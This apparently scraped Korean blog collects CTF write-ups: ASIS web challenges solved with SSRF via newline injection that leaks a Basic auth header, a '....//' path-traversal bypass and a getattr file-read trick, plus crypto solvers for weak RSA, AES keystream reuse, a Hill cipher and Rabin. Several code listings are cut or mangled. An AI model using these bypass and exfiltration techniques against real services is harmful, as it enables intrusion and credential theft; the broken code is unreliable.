Crypto Python Code

2019. 11. 20. 23:11

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요. php-reverse2

2019. 11. 20. 19:14

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요. Smartie

2019. 11. 19. 20:07

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

요 대회는 신기하게 Final인데 서버가 열려있길래 풀어봤다.

Trust Zone

문제에서 주어진 기능은 아래와 같고 ssrf가 있다. 


필터링 같은 경우 전체 url이 .doc로 끝나는지 검증하고 있었고, 인풋에 시작이로 시작하는지 검증하고 있었다. 이 때문에 다른 호스트로 요청이 일단 힘들었고 .doc 검증은 그냥 내가 요청할 경로 뒤에 .doc 붙여주면 우회가 되긴 했는데 할만한게 안보였다. 그래서 이것저것 보다 인풋을 http://66.172.33/59/docs/ 이런식으로 주면 디렉토리 리스팅이되서 요청 경로 내 파일 리스트를 알 수 있었다.

디렉토리 리스팅으로 알게된 경로는 아래와 같았다.

위에서 flag 페이지에 접근하면 post로 요청하라고 했다. 그래서 일단 그냥 위 기능을 안쓰고에 직접 접근해보니 IP 접근 제한이 존재하는지 401이 뜨면서 계정을 요구했다. 

위 기능에서 일단 post로 flag.php를 요청할만한 게 딱히 안보여서 일단에 접근해보니 filename이란 파라미터로 파일 읽기가 가능했다. 


file_get_contents를 쓰고 있는거 같았고 이걸로 flag.php를 요청하려고 했는데 안됐다. 그래서 해당 파일을 읽어보니 인풋 앞에 /var/www/html/이 붙고 있어서 http 요청이 불가능했다.

401 인증을 우회해야되나 싶어서 추가로 .htaccess 파일 leak 후 .htpasswd 경로 확인해서 password crack을 해봤는데 비밀번호가 안나왔다.


<IfModule mod_rewrite.c>

    RewriteEngine On

    RedirectMatch 301 (.*).doc$$1


AuthType Basic

AuthName \"Restricted Content\"

AuthUserFile /etc/apache2/.htpasswd

Require valid-user




딱히 더 뭐 할게 안보여서 다시 원점으로 돌아가서 기본 기능에서 도메인 우회가 가능한지 이것저것 테스트해보다가 아래와 같이 개행을 넣었을때 요런 에러가 터지는 걸 볼 수 있었다.



error messgae

{"code":200,"data":{"err":"HTTPConnectionPool(host='', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f953c45ed10>: Failed to establish a new connection: [Errno -2] Name or service not known'))"}}

개행 뒤에 넣은 인풋이 도메인 ip뒤에 붙는 걸 볼 수 있었다.

이걸로 도메인 우회가 가능하겠다 싶었고 아래와 같이 요청하니 내 서버로 요청이 이루어졌다. 




GET / HTTP/1.1

Host: my_ip:9999

User-Agent: python-requests/2.22.0

Accept-Encoding: gzip, deflate

Accept: */*

Connection: keep-alive

Authorization: Basic c2VjcjN0VXNlcl9zeXM6ZWQ2MGNiZDYwZTgzNzg4NTg5YTI1NGUxMzZiYjA


서버로 Authorization header가 전송됬고 이 값을 그대로 세팅해서 flag.php 요청하니 플래그가 나왔다.


POST /flag/flag.php HTTP/1.1


Authorization: Basic c2VjcjN0VXNlcl9zeXM6ZWQ2MGNiZDYwZTgzNzg4NTg5YTI1NGUxMzZiYjAzMGI=

Content-Length: 0  

flag = ASIS{ce4e0de7ace0353bc9370d36365c3a17}

Protected Area

파일 존재 여부 및 읽기 기능 두 가지가 존재한다.

파일 읽기 시 ../ 필터랑 요청한 파일 경로의 맨 뒤 4 글자가 .txt인지 검증한다.

../는 ....//로 우회하면 되고, 확장자 검증은 퍼징 돌려보면 & 가지고 우회가 가능하다.

이걸로 아래 순서로 소스 쭉쭉 긁어서 플래그 뿌려주는 루틴 만족시키면 된다.




if ah == hashlib.md5((Config.ADMIN_PASS + Config.SECRET).encode("utf-8")).hexdigest():

import os

class Config:

    """Set Flask configuration vars from .env file."""

    # general config

    FLAG       = os.environ.get('FLAG')

    SECRET     = "s3cr3t"

    ADMIN_PASS = "b5ec168843f71c6f6c30808c78b9f55d"


GET /protected_area_0098 HTTP/1.1


ah: cbd54a3499ba0f4b221218af1958e281

Flag = ASIS{f70a0203d638a0c90a490ad46a94e394}

Protected Area2

이전 문제에서 .txt 검증 루틴이 변경되서 필터링 우회가 안된다. 다른 벡터를 찾아야하는데 파일 존재 여부를 검증하는 /check_perm/readable/ uri에서 readble 부분 값을 바꿔보면 아래와 같은 에러가 발생한다.

'_io.TextIOWrapper' object has no attribute '1'

/check_perm/인풋/ 해당 영역 값이 TextIowrapper 객체의 속성으로 들어가고 있다. 이를 통해 readable을 read로 바꿔주면 파일 읽기가 가능해진다.


이제 소스코드를 찾기 위해 웹 루트를 찾아야되는데 /proc/self/cmdline이 안 읽혀서 아래 순서로 nginx 설정 파일을 통해 웹 루트를 찾고 소스 코드를 leak했다.







@app.route('/protected_area/<file_hash>', methods=['GET'])

def app_protected_area(file_hash) -> str:


        if str(hash(open(Config.FLAG))) == file_hash:

            return send_file(Config.FLAG_SEND)




        return "500"

class Config:

    """Set Flask configuration vars from .env file."""

    # general config

    FLAG      = "flag/flag"

    FLAG_SEND = "../flag/flag"

플래그를 얻으려면 flag파일 객체의 해쉬 값을 알아내야 한다. 그래서 그냥 이전 기능을 통해 플래그 파일을 읽으려고 하면 아래와 같이 삽입한 메소드의 리턴 값이 str type일 경우 파일 경로에 flag가 존재하는지 검증해서 flag 파일을 읽을 수가 없다.

@app.route('/check_perm/<method>/', methods=['GET'])

def app_checkb_file(method) -> json:


        file = request.args.get("file")

        if file.find('/proc') != -1:

            return "0"

        file_path = os.path.normpath('/files/{}'.format(file))

        with open(file_path, 'r') as f:

            call = getattr(f, method)()

            if type(call) == int:

                return str(call)

            elif type(call) != list and file.find('flag') == -1:

                return str(call)

            return '0'

    except Exception as e:

        return str(e)

여기서 딱 봐도 이상한게 return 값이 int일 때는 파일명 검증을 안하고 있는 부분이 있기 때문에 이걸 가지고 뭔가 하면 될 것 같았다. file 객체의 attribute를 쭉 확인해보니 __hash__란 메서드가 보였다.

호출해보니 반환 값이 int형이었고 아래 코드가 성립하길래 이걸로 flag파일의 해쉬 값을 구했다.





Flag = ASIS{1b7dc3a5ba52a11f0361bec284e59d58}

'CTF > Writeup' 카테고리의 다른 글

Zer0pts CTF 2020 Writeup  (1) 2020.03.08
Christmas CTF 2019 Write up  (4) 2019.12.30
CCE(사이버공격방어대회) 2019 Write up  (0) 2019.09.29
InCTF 2019 Web Write up  (0) 2019.09.23
CSAW CTF 2019 Web Write up  (0) 2019.09.16
블로그 이미지


메모 기록용 공간

, php-reverse

2019. 11. 17. 23:24

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요. Interview

2019. 11. 16. 03:57

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요. LameassLibrary

2019. 11. 16. 01:22

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

문제에서 제공하는 파일은 클라이언트용 파이썬 코드와 pcap 파일 두가지이다.

먼저 클라이언트 파이썬 코드를 보면 아래와 같다.

from socket import *

from ssl import *

import time

def recv_until(s, string):

    result = ''

    while string not in result:

        result += s.recv(1)

    return result

client_socket=socket(AF_INET, SOCK_STREAM)

tls_client = wrap_socket(client_socket, ssl_version=PROTOCOL_TLSv1_2, cert_reqs=CERT_NONE)

print "[+] Connecting with server.."


print "[+] Connect OK"

while 1:

    data = recv_until(tls_client, "Input : ")

    print data


    user_input = raw_input()


    if user_input == "u":

        print "Sorry.. Not support function.."


    elif user_input == "d": 


    elif user_input == "r":


    elif user_input == "l":

        print "Sorry.. Not support function.."



        print "Invalid input!"




예전 문제라 현재 서버가 존재하지 않지만 코드를 보면 방향키 입력 시 해당 방향과 매칭되는 해쉬값을 서버에 보내 실제 방향 이동을 하는 것 같았다.

근데 이 때 4가지 방향 중 2가지 방향에 대한 해쉬 값이 없어 방향 이동 제한이 존재하는 것 같았고 실제 문제 출제가 어떻게 되었었는지 확인해보니 게임을 통해 플래그 위치까지 가려면 4가지 방향에 대해 모두 이동을 해야만 하는 상황이었었다.

해당 코드만 가지고 뭔가 할만한건 없으니 pcap 파일을 보면 통신이 TLS로 이루어져 패킷 내용을 확인할 수 없는 상황이었다.

여기서 뭘 해야할지 감이 안왔는데 크립토 문제였기 때문에 일단 와이어샤크를 통해 TLS 통신 시 사용된 인증서를 추출한 뒤 공개키가 소인수분해가 되거나, factor db를 통해 p,q를 구할 수 있는지 확인해보는식으로 진행해봤다.

인증서 추출은 아래 글을 참고

추출한 인증서에서 n 값을 확인

openssl x509 -inform der -in test.crt -pubkey -noout > pub.key

python --dumpkey --key pub.key

[*] n: 316033277426326097045474758505704980910037958719395560565571239100878192955228495343184968305477308460190076404967552110644822298179716669689426595435572597197633507818204621591917460417859294285475630901332588545477552125047019022149746524843545923758425353103063134585375275638257720039414711534847429265419

[*] e: 65537

factordb에서 p,q 값 확인

p = 17777324810733646969488445787976391269105128850805128551409042425916175469168770593916088768472336728042727873643069063316671869732507795155086000807594027

q = 17777324810733646969488445787976391269105128850805128551409042425916175469483806303918279424710789334026260880628723893508382860291986009694703181381742497

인증서에 사용된 공개키를 통해 d를 구할 수 있는 상황이기 때문에 RsactfTool을 이용해 private key를 생성한 뒤 wireshark에 생성한 private key를 적용해줬다.

python --publickey pub.key --private > pri.key

아래 게시글을 참조하여 생성한 개인키 와이어 샤크에 적용

위 과정들을 통해 pcap 파일에 존재하는 패킷 내용을 복호화 할 수 있었고, 통신 내용을 확인해보니 아래와 같이 나머지 두 방향키에 대한 해쉬 값을 확인할 수 있었다.

이제 모든 방향 이동이 가능하기 때문에 게임 클리어가 가능하고 이를 통해 플래그를 구해주면 된다.

블로그 이미지


메모 기록용 공간


import multiprocessing

from Crypto.Cipher import AES

from secret import key, flag

counter = 0

aes =, AES.MODE_ECB)

def chunk(input_data, size):

    return [input_data[i:i + size] for i in range(0, len(input_data), size)]

def xor(*t):

    from functools import reduce

    from operator import xor

    return [reduce(xor, x, 0) for x in zip(*t)]

def xor_string(t1, t2):

    t1 = map(ord, t1)

    t2 = map(ord, t2)

    return "".join(map(chr, xor(t1, t2)))

def pad(data):

    pad_byte = 16 - len(data) % 16

    return data + (chr(pad_byte) * pad_byte)

def worker_function(block):

    global counter

    key_stream = aes.encrypt(pad(str(counter)))

    result = xor_string(block, key_stream)

    counter += 1

    return result

def distribute_work(worker, data_list, processes=8):

    pool = multiprocessing.Pool(processes=processes)

    result =, data_list)


    return result

def encrypt_parallel(plaintext, workers_number):

    chunks = chunk(pad(plaintext), 16)

    results = distribute_work(worker_function, chunks, workers_number)

    return "".join(results)

def main():

    plaintext = """The Song of the Count

You know that I am called the Count

Because I really love to count

I could sit and count all day

Sometimes I get carried away

I count slowly, slowly, slowly getting faster

Once I've started counting it's really hard to stop

Faster, faster. It is so exciting!

I could count forever, count until I drop

1! 2! 3! 4!

1-2-3-4, 1-2-3-4,

1-2, i love couning whatever the ammount haha!

1-2-3-4, heyyayayay heyayayay that's the sound of the count

I count the spiders on the wall...

I count the cobwebs in the hall...

I count the candles on the shelf...

When I'm alone, I count myself!

I count slowly, slowly, slowly getting faster

Once I've started counting it's really hard to stop

Faster, faster. It is so exciting!

I could count forever, count until I drop

1! 2! 3! 4!

1-2-3-4, 1-2-3-4, 1,

2 I love counting whatever the

ammount! 1-2-3-4 heyayayay heayayay 1-2-3-4

That's the song of the Count!

""" + flag

    encrypted = encrypt_parallel(plaintext, 32)


if __name__ == '__main__':



from Crypto.Util.strxor import strxor

def pad(data):

    pad_byte = 16 - len(data) % 16

    return data + (chr(pad_byte) * pad_byte)

def unpad(data):

    last_char = data[-1]

    if ord(last_char) < 16:

        return data.rstrip(last_char)


        return data

def chunk(input_data, size):

    return [input_data[i:i + size] for i in range(0, len(input_data), size)]

def xor(*t):

    from functools import reduce

    from operator import xor

    return [reduce(xor, x, 0) for x in zip(*t)]

def xor_string(t1, t2):

    t1 = map(ord, t1)

    t2 = map(ord, t2)

    return "".join(map(chr, xor(t1, t2)))

def is_printable(data):

    for i in data:

        if ord(i)<32 or ord(i)>127:

            return False

    return True

plaintext = """The Song of the Count

You know that I am called the Count

Because I really love to count

I could sit and count all day

Sometimes I get carried away

I count slowly, slowly, slowly getting faster

Once I've started counting it's really hard to stop

Faster, faster. It is so exciting!

I could count forever, count until I drop

1! 2! 3! 4!

1-2-3-4, 1-2-3-4,

1-2, i love couning whatever the ammount haha!

1-2-3-4, heyyayayay heyayayay that's the sound of the count

I count the spiders on the wall...

I count the cobwebs in the hall...

I count the candles on the shelf...

When I'm alone, I count myself!

I count slowly, slowly, slowly getting faster

Once I've started counting it's really hard to stop

Faster, faster. It is so exciting!

I could count forever, count until I drop

1! 2! 3! 4!

1-2-3-4, 1-2-3-4, 1,

2 I love counting whatever the

ammount! 1-2-3-4 heyayayay heayayay 1-2-3-4

That's the song of the Count!


output = "9d5c66e65fae92af9c8a55d9d3bf640e8a5b76a878cbf691d3901392c9b8760ebd5c62b22c88dca9d1c55098cbbb644ae9406ba32c8293bdd29139bbc2b4605bba51238f2cb399a9d0894ad9cbb8774be9406ce66fae89a6c8ef7ad9c4b87442ad1470af78e19da6d8c55096d2b9750ea8586fe668a085c2ef8a5e9cd3be6c4bba144ae66ba488e8df84418bceb2650ea84362bf0688dcabd3905d8d87a46d414626be04a58215b84263a620de3203fa4626be08e2940da35c61b82c98201ce15438cd67eb921cf77c28a969de321bf4433ea24ca59216a25b7bb662996106e11639e75ae09015bb4c2fb76d8c254fe15e6ab45cea817391547cab698c6d4ff35039b34df7df599e412fb67fde3200b55432a441f19817b01405962c9d2e1af9556aa447f09f0df75360ad6988241db91129a85deb8559a25b7bb660de084ff1cc3a0e8041bc71d71fb29883931d9d3e8f784ca743b065c91ea386909e1a9100925f4fa742b1718c1efec4d4d609df5bcb3b17e417bd268d5fe6ced4d65b9c40d6305eeb1df03e9050e68bcad241dd15b46453b85dae7cd112b2c3c7ca50dd4ddf2c1ff350f5349c5febcadbd2509c40d6340aad03bd258d5bb2d8cdc647d814d1335efe18f8718651e7c5d6b9609c57d12010fe50e939801ee1dbcbd74cce4739c1eeceba8ef87360b629ed82a6eb9d508ee381bb88e97363bf20a1cfe7a7e07cccf3cea788bd277fb265e9cde4a9b937808aa7ee85f22679a365f5c4ede5f478c0e482ab95bd3c79f731e9c9a8b6ff7cc2e6c0e0c897047fb22ba1e5afa8b778c2ef80abcabd1a37b42af4c2fce5fa60dde582a8c7971a37b42af4c2fce5e475c1f782b7cabd207bb832edd5a4e5e4130a976ad4a2fe86ac99c18491f9f6c86adae59cc4a9f33072f70ca6daede5e40b049272c8e6b980b798c69e9fb7f7891611c7758df0fc82b481d1ca9eb8e2cd5f118f26def6f693d2abc99982bce2855f038175d9e7ebcdf8a4dcca9faab0da1045857eceebed8ab68a89e0bff9f3c60a098426ceedec8daccdce8584bce6cc0d49c065c2f7f797f898c69e9fb5b0e05f019269dd88a8c2f8df89cac5f8b09d00ad16dc760ead7c3518baed47603c5b5251cc269cae93d1f8a4888699aff58942c8529f304af0362143f2bd1e37670d538753992129ff3c6c5befb21e7331590c950ac26917be39644dfba50b2b70117fcbccba57b209ae95721a1c9d36073d934b75014109102be14fb6a044a7cf9e468748976457f6342177f5a9042630622f97d2ba5a8c04a7890d4e5fcb445b7600d7c1be71b711b6b32b4444f078557ef82e4f0559225437b455aa9a0bbaff89c834531a45115125c933d6cd6cdca8f8".decode("hex")

chunks = chunk(pad(plaintext), 16)

keyStream_list = []

for i in range(0,len(chunks)-1):


keyStream_list = list(set(keyStream_list))

for i in range(len(chunks)-1,len(output)/16):

    print "------------------------"

    for j in range(0,len(keyStream_list)):

        result = unpad(strxor(keyStream_list[j].decode("hex"), output[i * 16:(i * 16) + 16]))

        if is_printable(result):

            print result

'Crypto & Network & Etc > Crypto Practice' 카테고리의 다른 글

Codegate 2018 CTF Miro  (0) 2019.11.15
Prayan CTF 2019 Crypto Write up  (0) 2019.11.15
TAMUCTF 2019 Crypto Writeup  (0) 2019.11.15
Seccon CTF 2017 Ps and Qs  (0) 2019.11.12
TokyoWesterns CTF 2018 Revolutional Secure Angou  (0) 2019.11.12
블로그 이미지


메모 기록용 공간


Decode This

문제에서 주어진 코드와 암호문은 다음과 같다.



import random

file = open("secret.txt","r")

secret =

flag = ""

for i in secret:

    if i.isalpha():

        flag += i

l = len(flag)

key = [[int(random.random()*10000) for e in range(2)] for e in range(2)]

# [[7156, 9059], [9366, 2474]]

i = 0

ciphertext = ""

while i <= (l-2):

    x = ord(flag[i]) - 97

    y = ord(flag[i+1]) - 97

    z = (x*key[0][0] + y*key[0][1])%26 + 97

    w = (x*key[1][0] + y*key[1][1])%26 + 97

    ciphertext = ciphertext + chr(z) + chr(w)

    i = i+2

cipherfile = open('ciphertext.txt','w')


암호화 과정에서 0~10000 범위의 랜덤 키 4가지가 사용된다.

간단히 생각하면 10000**4의 경우의 수를 브포해서 유의미한 문자열을 찾으면 될 것 같긴한데 범위가 크기도하고 이런걸 의도한 문제는 아닌 것 같아서 다른 방향으로 생각해봤다.

암호화 코드를 좀 더 보니 코드에 나온 수식이 아래와 같이 변경 가능했고 이를 통해 실질적으로 키 값의 범위가 0~10000가 아닌 0~26인 것을 알 수 있었다.

z = (x*key[0][0] + y*key[0][1])%26 + 97

z = ((x%26)*(key[0][0]%26))%26+((y%26)*(key[0][1]%26))%26+97

이를 통해 키 범위를 26**4=456976으로 줄일 수 있었고 추가로 문자열 복호화 시 플래그 포멧인 pctf 문자열을 생성하는 키들을 따로 추출해 복호화 하는식으로 키 범위를 더 줄여서 플래그를 구했다.

def get_key(enc_flag):

    flag_format = "pctf"

    for j in range(0,26):

        for k in range(0,26):

                x = ord(flag_format[0]) - 97

                y = ord(flag_format[1]) - 97

                p = ord(flag_format[2]) - 97

                q = ord(flag_format[3]) - 97

                z = (x * j + y * k) % 26 + 97

                w = (x * j + y * k) % 26 + 97

                r = (p * j + q * k) % 26 + 97

                u = (p * j + q * k) % 26 + 97

                if z==ord(enc_flag[0]) and r==ord(enc_flag[2]):


                if w==ord(enc_flag[1]) and u==ord(enc_flag[3]):


    return [k1,k2]

def decrypt_flag(key,enc_flag):

    flag = ""

    for i in range(0, len(enc_flag), 2):

        for j in range(ord('a'), ord('z') + 1):

            for k in range(ord('a'), ord('z') + 1):

                x = j - 97

                y = k - 97

                z = (x * key[0][0] + y * key[0][1]) % 26 + 97

                w = (x * key[1][0] + y * key[1][1]) % 26 + 97

                if z == ord(enc_flag[i]) and w == ord(enc_flag[i + 1]):

                    flag += chr(j) + chr(k)

    if "pctf" in flag:

        print flag

enc_flag = "vuqxyugfyzfjgoccjkxlqvguczymjhpmjkyzoilsxlwtmccclwizqbetwthkkvilkruufwuu"

for i in range(0,len(enc_flag)-4,2):

    key = get_key(enc_flag[i:i+4])












위 결과 중 의미있는 문장이 딱 하나 나온다.


Flag = pctf{ilikeclimbinghillswhataboutyou}

Easy RSA

주어진 정보는 아래와 같다.


e 값이 엄청 커서 위너 어택 코드를 돌려보면 개인키를 구할 수 있고 이걸로 그냥 복호화하면 된다.

from gmpy2 import *


d = 12978409760901509356642421072925801006324287746872153539187221529835976408177

n = 413514550275673527863957027545525175432824699510881864021105557583918890022061739148026915990124447164572528944722263717357237476264481036272236727160588284145055425035045871562541038353702292714978768468806464985590036061328334595717970895975121788928626837881214128786266719801269965024179019247618967408217

c = 337907824405966440030495671003069758278111764297629248609638912154235544001123799434176915113308593275372838266739188034566867280295804636556069233774555055521212823481663542294565892061947925909547184805760988117713501561339405677394457210062631040728412334490054091265643226842490973415231820626551757008360


Help Rabin

문제에서 주어진 정보는 다음과 같다.

- public pem file

- 암호문

- 암호화 시 사용한 코드

먼저 암호화 시 사용된 코드를 보면 다음과 같다.

from Crypto.Util.number import *

import random

def nextPrime(prim):

    if isPrime(prim):

        return prim


        return nextPrime(prim+1)

p = getPrime(512)

q = nextPrime(p+1)

while p%4 != 3 or q%4 !=3:

    p = getPrime(512)

    q = nextPrime(p+1)

n = p*q

m = open('secret.txt').read()

m = bytes_to_long(m)

m = m**e

c = (m*m)%n

c = long_to_bytes(c)

c = c.encode('hex')

cipherfile = open('ciphertext.txt','w')


암호화 코드를 보면 p,q 값이 거의 차이가 나지 않기 때문에 n 값만 알아도 p,q를 구할 수 있다. n 값은 pem 파일을 통해 확인했고, 추가로 조금 특이한게 암호화 코드를 잘 보면 결국 수행하는 행위가 c=(m**2)%n 이다. e가 2라는 건데 이런 경우에는 d가 생성이 안된다. rsa라고 생각했는데 rsa가 아닌거 같았고 e가 2인경우에 대해 찾아보니 rabin이라는 암호화가 존재하는 걸 알 수 있었다. 문제이름도 마침 rabin이었고 실제로 찾아보니 암호화 과정이 동일해서 해당 암호를 복호화하는 python 코드를 통해 플래그를 찾았다.

from Crypto.Util.number import *

from gmpy2 import *

def egcd(a, b):

    if a == 0:

        return b, 0, 1


        gcd, y, x = egcd(b % a, a)

        return gcd, x - (b // a) * y, y

# python --dumpkey --key pub.key

n = 68367741643352408657735068643514841659753216083862769094847066695306696933618090026602354837201210914348646470450259642887798188510482019698636160200778870456236361521880907328722252080005877088416283896813311117096542977573101128888124000494645965045855288082328139311932783360168599377647677632122110245577

p = isqrt(n)

while True:

    q, r = t_divmod(n, p)

    if r == 0:


    p += 1

c = 0x4f741fe93dd7e383ff527caa9a2f27d27fd74b53b62123837b74a2b024d0fbbe052f3b330ce5208ba989fc68e2f5235ac4e9dd9e091e7cb80c02745d9b2aad10cab9431590ae63117ce539ebf747b4bc81f2a293aea52f0b1fee746158dc45d0c8d60769a8a8e671fb049b52669a010a1ca6f5de851d715bf1821d8771bbeb47

r = pow(c, long((p+1)/4), long(p))

s = pow(c, long((q+1)/4), long(q))

gcd, c, d = egcd(p, q)

x = (r * d * q + s * c * p) % n

y = (r * d * q - s * c * p) % n

plain_list = [x, n - x, y, n - y]

for plain in plain_list:

    flag = long_to_bytes(plain)

    print flag

'Crypto & Network & Etc > Crypto Practice' 카테고리의 다른 글

Codegate 2018 CTF Miro  (0) 2019.11.15
CONFidence CTF 2019 Count me in  (0) 2019.11.15
TAMUCTF 2019 Crypto Writeup  (0) 2019.11.15
Seccon CTF 2017 Ps and Qs  (0) 2019.11.12
TokyoWesterns CTF 2018 Revolutional Secure Angou  (0) 2019.11.12
블로그 이미지


메모 기록용 공간
